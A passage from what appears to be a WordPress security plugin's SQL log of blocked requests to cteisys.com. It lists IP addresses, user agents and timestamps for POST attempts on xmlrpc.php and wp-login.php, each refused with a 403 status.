(Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','D5WLokOyzSvH9E18GX62mMxu',0,1664608083.6849,1901,'','POST',403,0,600,0,1,'',0),('198.12.250.252',3322739452,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','E3sFbySJXhT7lPZWG14kLoaD',0,1664607641.0394,2957,'','POST',403,0,515,0,1,'',0),('52.178.114.226',884110050,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','C4uUdxPHf2Ln6sgeTjcmSZaQ',0,1664612644.1134,911,'','POST',403,0,600,0,1,'',0),('143.198.161.92',2412159324,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','7x9vIW2PHrdKQBlFgOznjV8o',0,1664612642.8965,1713,'','POST',403,0,600,0,1,'',0),('103.145.51.200',1737569224,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ubT4D6KSULeHZa2nx1lmYCNI',0,1664612637.2041,5603,'','POST',403,0,515,0,1,'',0),('62.210.181.102',1053996390,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pS9qHbC5l1nzM0m3IvNLaPTZ',0,1664612421.4793,18559,'','POST',403,0,515,0,1,'',0),('107.189.14.89',1807552089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','k7PVtKWT84j3Qey6rBdEnuMH',0,1664612003.2233,456,'','POST',403,0,600,0,1,'',0),('171.244.21.74',2884900170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','RvSmwjHtTbZd9YAXNE2Gizfu',0,1664611800.1464,17794,'','POST',403,0,515,0,1,'',0),('51.255.64.58',872366138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WTB8cvnAtYQHVyI3XGJUi0kM',0,1664611661.5466,18811,'','POST',403,0,515,0,1,'',0),('188.212.34.36',3168018980,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BweoslGKz2A30nH781k4VUrW',0,1664617083.8356,1357,'','POST',403,0,515,0,1,'',0),('185.225.33.99',3118539107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CkMOiIy8rBtcb31vzxpfJ4oh',0,1664616846.9141,19043,'','POST',403,0,515,0,1,'',0),('103.180.120.176',1739880624,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HGsKIDPtuTg5YAXyLO62Nmp9',0,1664616392.4513,1519,'','POST',403,0,515,0,1,'',0),('37.187.24.159',633018527,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9utXYnV2OWNjglLPpUfM5B4v',0,1664616216.7115,1439,'','POST',403,0,515,0,1,'',0),('51.75.146.208',860590800,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fj4iXVGwrsTeqmDBYC1J2ISv',0,1664615974.4046,1535,'','POST',403,0,515,0,1,'',0),('107.189.6.184',1807550136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','GCEKJATxqiM3jYQt9HzZb2lp',0,1664615944.7184,468,'','POST',403,0,600,0,1,'',0),('162.144.49.214',2727358934,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BzZRkM7gXPwQEd1s9nIbxuYU',0,1664615790.7933,1231,'','POST',403,0,515,0,1,'',0),('20.39.240.246',338161910,'','http://cteisys.com/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Sfz9YH7g6qyvAxltbp2B1UDw',0,1664615788.2175,277,'','GET',403,0,700,0,1,'',0),('64.235.231.20',1089201940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aSbdsviOkHAnmTPLfhI1eywz',0,1664615571.1353,18145,'','POST',403,0,515,0,1,'',0),('173.212.215.38',2916407078,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sMb9rDqyfRu4dg236wicOCYG',0,1664615116.9798,1746,'','POST',403,0,515,0,1,'',0),('141.98.102.179',2372036275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZITaMigLDkw4cvonJ0XflzHt',0,1664615038.0855,1260,'','POST',403,0,515,0,1,'',0),('111.90.150.171',1868207787,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uXhr8FxGcS426eoRmYAfqUdv',0,1664614921.3438,19054,'','POST',403,0,515,0,1,'',0),('173.212.215.38',2916407078,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','acVY7tsRGn59bpW8yxfQE1Lm',0,1664620177.7360,1199,'','POST',403,0,515,0,1,'',0),('173.212.215.38',2916407078,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AwhStxTVDqpsc9ngCbz4ZQOj',0,1664619926.6714,1410,'','POST',403,0,515,0,1,'',0),('62.102.148.185',1046910137,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EXQwrqsLdciKuCM2OFmeWxAD',0,1664619752.9832,18316,'','POST',403,0,515,0,1,'',0),('106.14.141.22',1779338518,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','du48QmDkz50hYPLXnxR2lvyB',0,1664619270.6279,1334,'','POST',403,0,515,0,1,'',0),('103.92.27.198',1734089670,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','T9GeAmavVJ80b7hwCypXL52q',0,1664619033.0433,18670,'','POST',403,0,515,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QwOhkclUrAdGMRJIZmPjFTxn',0,1664618597.7491,1803,'','POST',403,0,515,0,1,'',0),('199.188.207.230',3351039974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tMXVKuEpHJ3YfUGZln2I05Oe',0,1664625501.6449,19525,'','POST',403,0,515,0,1,'',0),('104.131.189.63',1753464127,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','S2TuqIsezxRoOB8L1rA5dXVa',0,1664624243.4403,19015,'','POST',403,0,515,0,1,'',0),('91.224.23.225',1541412833,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QbWeGx1shBw9oq4uAUZHrY8t',0,1664623600.8363,18589,'','POST',403,0,515,0,1,'',0),('173.236.194.143',2917974671,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','k8s6xo2tNTveFpfHgzGP3rwO',0,1664623313.6293,18623,'','POST',403,0,515,0,1,'',0),('45.149.77.114',764759410,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iEaU5IkfucZxyJmrhWoDCbd2',0,1664623088.7584,18353,'','POST',403,0,515,0,1,'',0),('103.74.118.242',1732933362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7I19OKqm3BbP8SYVtcRfZpCL',0,1664622848.0463,18289,'','POST',403,0,515,0,1,'',0),('42.200.109.156',717778332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sOlC5Rh34r6tUAQKHxcDydVo',0,1664622600.0624,18539,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wKCkfhHiZjuNDgmS94op7yBJ',0,1664622408.1656,18601,'','POST',403,0,515,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FoMHpslKJWqBx230NncjGPkV',0,1664622156.8984,18377,'','POST',403,0,515,0,1,'',0),('209.126.8.92',3514697820,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TjBUKb39RV8tY4qaMsQmSJd5',0,1664627363.6596,1273,'','POST',403,0,515,0,1,'',0),('8.210.174.93',148024925,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RrG2LqE9fcvuTpXAdW7VoMxO',0,1664626900.5688,1689,'','POST',403,0,515,0,1,'',0),('192.81.214.91',3226588763,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IbKyZaveqAxM2WP3BRCkUcgL',0,1664627120.7122,1597,'','POST',403,0,515,0,1,'',0),('208.109.39.235',3496814571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8FfZgQx9jEpa7CyukNhslUXb',0,1664626635.5833,19581,'','POST',403,0,515,0,1,'',0),('34.68.97.70',574906694,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lo8Jyi3DsuaHLE2VAUQCRXnr',0,1664626437.6753,18617,'','POST',403,0,515,0,1,'',0),('159.203.31.171',2680889259,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bJcl2AeDXHWPn9LhzdRErkOU',0,1664625972.1666,18700,'','POST',403,0,515,0,1,'',0),('134.209.105.240',2261871088,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sc0Au3pHWKDFZVTUzndlaSrE',0,1664625695.6073,19692,'','POST',403,0,515,0,1,'',0),('18.195.88.209',314792145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oIF07zkdM2SNmsZxwfUXtHAO',0,1664630745.7753,18218,'','POST',403,0,515,0,1,'',0),('131.72.236.73',2202594377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MqmzO8gWZVEJpyefYSo2sknh',0,1664630261.2249,1437,'','POST',403,0,515,0,1,'',0),('194.99.104.35',3261294627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tTC8YlHJr712uGxSdbLOaDKU',0,1664630005.3411,522,'','POST',403,0,515,0,1,'',0),('185.225.33.99',3118539107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','h1PfGiW8IFOKj2uRYDqCyaps',0,1664629997.9523,1325,'','POST',403,0,515,0,1,'',0),('159.65.219.142',2671893390,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iIfqjsYd2c5XomVKvRxOU8Fh',0,1664629778.6558,1274,'','POST',403,0,515,0,1,'',0),('45.125.239.179',763228083,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LnoyKmGRJY76q3FHhD9XlT8C',0,1664629492.8575,1225,'','POST',403,0,515,0,1,'',0),('217.151.98.168',3650577064,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ipBN1Ykq25d6gEDx0CAVebIM',0,1664629352.7891,1417,'','POST',403,0,515,0,1,'',0),('107.180.107.103',1806986087,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9ikvMnswN7mqYI6TedU3at0f',0,1664634888.2263,19601,'','POST',403,0,515,0,1,'',0),('146.70.61.131',2454076803,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Ce3c9aXPzrq7ltT2NBdkyjYm',0,1664634534.7565,19004,'','POST',403,0,515,0,1,'',0),('103.90.235.70',1734011718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LNDKSjXvIVEoP4HaYpRuZJ73',0,1664634374.2443,14900,'','POST',403,0,515,0,1,'',0),('103.154.177.165',1738191269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fRATjE0HehQNL7PKW6X9FV2D',0,1664634149.0234,4223,'','POST',403,0,515,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kwSThPLW27UvBxc9GO4rpDYV',0,1664633875.1812,1644,'','POST',403,0,515,0,1,'',0),('18.195.88.209',314792145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6y341VgoJMhRTS8aj7KwPvBY',0,1664633675.3070,19638,'','POST',403,0,515,0,1,'',0),('198.38.88.250',3324401914,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YQoCM6NFJzKVkPthvqb2HEa9',0,1664633175.9632,19485,'','POST',403,0,515,0,1,'',0),('112.78.4.244',1884161268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','t4h1L8sjN37Hok5Ydz6TIbqr',0,1664632888.9184,9136,'','POST',403,0,515,0,1,'',0),('81.68.222.69',1363467845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HecugK14jPZvyb2G0SnV5Jmz',0,1664638151.4789,18978,'','POST',403,0,515,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','V8iT4HmQ0YqvJebR2cEfW1zo',0,1664637879.2338,18846,'','POST',403,0,515,0,1,'',0),('103.90.235.91',1734011739,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UfKSdjTt6PHQNME9GJWrLxg2',0,1664637388.4343,19434,'','POST',403,0,515,0,1,'',0),('43.225.53.24',736179480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cJsGNua4n3pI508jrAlyDzmw',0,1664637191.0399,18399,'','POST',403,0,515,0,1,'',0),('213.152.187.235',3583556587,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dXLFbuUg92JRfZt1y7GwWsOA',0,1664637067.5746,2325,'','POST',403,0,515,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','xrCqTjk7vXoUhRz352twgs0J',0,1664637023.9518,17447,'','POST',403,0,600,0,1,'',0),('20.109.101.102',342713702,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7Os4CNRHrY5wuE6cxZSDGb3z',0,1664636904.9490,19674,'','POST',403,0,515,0,1,'',0),('190.145.68.131',3197191299,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JhaORgtbz6dciM4IYe7n5xyH',0,1664636684.5820,18749,'','POST',403,0,515,0,1,'',0),('213.152.162.74',3583550026,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9aMO38Cpcxim1HoLyhUqkYbV',0,1664636559.4312,1313,'','POST',403,0,515,0,1,'',0),('173.212.197.26',2916402458,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yrmJ4Q0vesnauC6lxzf2hFDA',0,1664636406.4465,18495,'','POST',403,0,515,0,1,'',0),('47.107.33.26',795549978,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0US3i8dKLFDklW4ba1fOn25s',0,1664640863.3325,13823,'','POST',403,0,515,0,1,'',0),('20.198.3.243',348521459,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','mK3EavrqwZjVGL9SxCM2hioz',0,1664640955.7309,582,'','POST',403,0,515,0,1,'',0),('31.210.66.35',533873187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VFy9AMiYD8QHoeuW1KkJOqsS',0,1664640658.3189,18991,'','POST',403,0,515,0,1,'',0),('42.200.109.156',717778332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','u2N6afbBZJp1QtnEcUPkwFiM',0,1664640362.5156,18616,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UAojYS7sMkd2qEp1guDO80mf',0,1664644395.0948,1233,'','POST',403,0,515,0,1,'',0),('87.106.229.31',1466623263,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HoxMOs74XIa5bkyp6VlhEtFR',0,1664644679.7709,1256,'','POST',403,0,515,0,1,'',0),('148.72.211.177',2487800753,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Qf5wOeV2ThbAmBYCGl7PjR8i',0,1664644154.7223,18287,'','POST',403,0,515,0,1,'',0),('104.131.189.63',1753464127,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vUisYbQWgmPNL4yAK2teXFCp',0,1664643649.1177,2402,'','POST',403,0,515,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Z6qwFJ0bRdECPjcVfYsikzxn',0,1664648262.0893,18314,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7nFtoMjHImz5rbVgUxwPSOuk',0,1664647985.0597,18989,'','POST',403,0,515,0,1,'',0),('177.222.54.214',2984130262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WSVo7IUegBZGKL6b3MOqJaXy',0,1664647748.5552,18828,'','POST',403,0,515,0,1,'',0),('35.193.197.89',599901529,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','chZ7gp8Qa0NCLvI24ndmy9xH',0,1664647469.6415,1709,'','POST',403,0,515,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sPjkud37OvDQcCwi180VzmZE',0,1664651099.5378,19341,'','POST',403,0,515,0,1,'',0),('20.109.101.102',342713702,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cekosCJphH45zaV6K3FBPIqO',0,1664654625.9813,19227,'','POST',403,0,515,0,1,'',0),('187.32.188.214',3139484886,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nQIlcGJgwaEKSmUHzWDbo3FN',0,1664659087.0356,18361,'','POST',403,0,515,0,1,'',0),('87.106.229.31',1466623263,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','phBz0b1q2UNZ6lTyc9frO8K5',0,1664658842.4729,11451,'','POST',403,0,515,0,1,'',0),('121.40.238.50',2032725554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MV5WCtJPZUFbHGyj8uqdBQR0',0,1664658541.4154,18856,'','POST',403,0,515,0,1,'',0),('194.42.98.32',3257557536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','d5uGTAjHvq8xzRl947arEUXt',0,1664662967.0957,1677,'','POST',403,0,515,0,1,'',0),('213.165.237.48',3584421168,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','l0m3KAYLgU67nMs2WuZo94Sk',0,1664662720.7887,17769,'','POST',403,0,515,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3NwSPLd4s0One9Z1GB85MjxC',0,1664662418.5743,2019,'','POST',403,0,515,0,1,'',0),('88.135.37.49',1485251889,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8TUBINqVgxKHlZrS3jFzhXWp',0,1664662184.6432,18613,'','POST',403,0,515,0,1,'',0),('51.159.15.23',866062103,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QPBaLjc3mInrURopVG9WzXZl',0,1664661849.4783,19156,'','POST',403,0,515,0,1,'',0),('173.212.201.41',2916403497,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lzSFsjd6RXcqKGYxDnI1vLB4',0,1664667512.8908,19048,'','POST',403,0,515,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 